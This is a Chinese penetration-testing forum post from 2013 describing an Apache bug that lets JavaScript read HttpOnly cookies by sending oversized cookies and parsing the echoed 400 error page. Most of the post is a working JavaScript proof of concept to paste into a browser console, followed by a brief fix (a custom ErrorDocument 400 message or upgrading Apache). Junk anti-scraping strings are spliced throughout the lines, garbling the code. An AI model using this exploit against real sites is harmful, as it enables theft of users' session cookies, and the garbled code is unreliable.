中国网络渗透测试联盟

标题: Apache HttpOnly Cookie XSS跨站漏洞 [打印本页]
作者: admin    时间: 2013-4-19 19:15
标题: Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。) W% d4 \/ q. B6 q
5 T" Z1 W3 |* [+ A1 y. w( s
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
; e5 d# O, A' A8 Q  Z5 ~ 2 l0 k  v+ Z- d( e1 p( E, f

! s1 z5 V' |0 B0 E! Y' ~7 ^6 h// http://www.exploit-db.com/exploits/18442/
/ {( R7 U* _0 k3 ~) Cfunction setCookies (good) {
6 ]2 C1 K: o8 L( V$ ?" D% g* ~// Construct string for cookie value: a& u4 n" T; S) _8 P% c6 V9 I* ?
var str = "";
8 O4 A( b4 U  R- Q" D0 d  N4 D; C/ pfor (var i=0; i< 819; i++) {- a# D! \: X2 n# A: P
str += "x";2 r+ C4 x0 y# M4 }$ f. v
}7 B+ \" T2 {( }# I
// Set cookies, V" {+ ~7 q( P2 u$ Y: `
for (i = 0; i < 10; i++) {- w$ i2 }4 j- o: L7 x6 |0 {# [& ~& [
// Expire evil cookie+ x2 u7 T0 D) {% n6 g
if (good) {8 ~. n8 r% O4 f6 H! l
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
# |2 m3 l8 V; L1 x}
3 q/ Q, X( i- j5 k1 {. u// Set evil cookie
& R9 P+ J. _& d9 N5 M7 [else {
  S7 i: [5 Z2 H7 h& X5 d- k6 @$ @var cookie = "xss"+i+"="+str+";path=/";) P" S0 Y: F; N9 e# i
}& S/ z7 K2 \2 S" j
document.cookie = cookie;
6 C: ]8 ]/ |/ b" T* E* u' k4 W}* h6 ]0 ^6 i2 K7 k5 c- j
}
: |/ o; P# g9 U8 Y4 |1 Ufunction makeRequest() {
# R" _7 [% U6 s* DsetCookies();
3 D/ T9 F3 z8 z  g, I* xfunction parseCookies () {
3 s6 ?8 }* Y1 R; G0 P' Evar cookie_dict = {};
: Y# p# i5 s% K! @. w$ L$ F% h0 i3 A* U// Only react on 400 status- i% t6 g. b$ {: N% w% E
if (xhr.readyState === 4 && xhr.status === 400) {
, v) [6 `1 ]0 |+ ]// Replace newlines and match <pre> content5 P& O  z2 {* y% @- v0 G
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
% u+ v8 {! y3 x6 \4 ]- g7 K1 kif (content.length) {5 Z5 z7 h: F* z5 i7 C
// Remove Cookie: prefix* \4 o# w# M) ]0 Y
content = content[1].replace("Cookie: ", "");0 Y. ^: C% E6 M! C- |$ E1 r. I
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);9 e9 ]% J( [3 A
// Add cookies to object
" q3 P2 F& p8 L, u& `for (var i=0; i<cookies.length; i++) {, Z% q; h2 A+ [5 f* ~7 B/ \
var s_c = cookies.split('=',2);6 z& u1 b- {7 I7 q" v7 a" d9 Z
cookie_dict[s_c[0]] = s_c[1];
* @" q' S) b& C  G# `9 v  {4 @7 a}
4 s6 y% ?- s2 q* }}5 r; `1 s4 r0 o% p
// Unset malicious cookies0 p3 J" t: q; D
setCookies(true);5 Q& G/ A3 |4 e# i0 G
alert(JSON.stringify(cookie_dict));  d8 m; Z: w" j( H# k
}
) R6 K/ B. p, U0 a% {) h}
8 `& T% A3 n! L# O// Make XHR request
) b4 Q  m  b9 c  R+ ]" Fvar xhr = new XMLHttpRequest();
0 m/ ~/ Y1 X1 ]4 S. z( cxhr.onreadystatechange = parseCookies;
7 J% A8 I7 K1 z0 T4 Qxhr.open("GET", "/", true);/ c8 c' s# T) X. e7 \
xhr.send(null);) _+ V% w9 \3 L" @0 l6 M% I. a) f
}  v! V$ [& l/ V& W; w$ P; y7 p
makeRequest();. ?. e. _; y$ @( B; o6 q* ~

! h9 e" S0 X8 B+ S% {. a你就能看见华丽丽的400错误包含着cookie信息。- E- J6 p# I6 j; b) W, x

+ B. t/ |1 ?) N" ~5 I: _下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#: x( X* z5 Y# G

8 v5 e$ l! H# I1 _' K修复方案:/ L3 H" ~# b+ }7 }
3 {/ _- W& g  V5 \
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下1 h% O! q& N& ]8 b
, r' j1 j$ ^4 }. C2 h
In the event of a problem or error, Apachecan be configured to do one of four things,2 S5 u% C) f: M! d# Y# i+ m. P

7 I/ Z' z0 z% L% {& n2 m0 p1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
: r+ S' Q) f" u! _! T6 E2. output acustomized message输出一段信息
, u* q! \9 z- m3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
5 h( B$ ?  w7 v* v& A' A1 Q4. redirect to an external URL to handle theproblem/error转向一个外部URL
6 k5 W) Q' i6 O& `7 X2 b6 y8 s* H) `: r
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容/ V* l+ E7 c4 ^$ S4 c9 f+ r: }
7 i5 ~# a  h7 d
Apache配置:# e! R. O  U/ H# x+ O3 Q, `; Q
: ]- H4 \6 u% P4 v* D$ y
ErrorDocument400 " security test"
' C+ S/ @# H2 D. n3 m
0 p4 o# u& H. ^) K当然,升级apache到最新也可:)。
5 E# ^- S: n- V" L* J2 @. M* U- d; ]& M9 ]# f. A! M
参考:http://httpd.apache.org/security/vulnerabilities_22.html6 p# ^" I& \; r, j& x

# d; W3 `/ U2 w. C# \, I- y: u- c



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2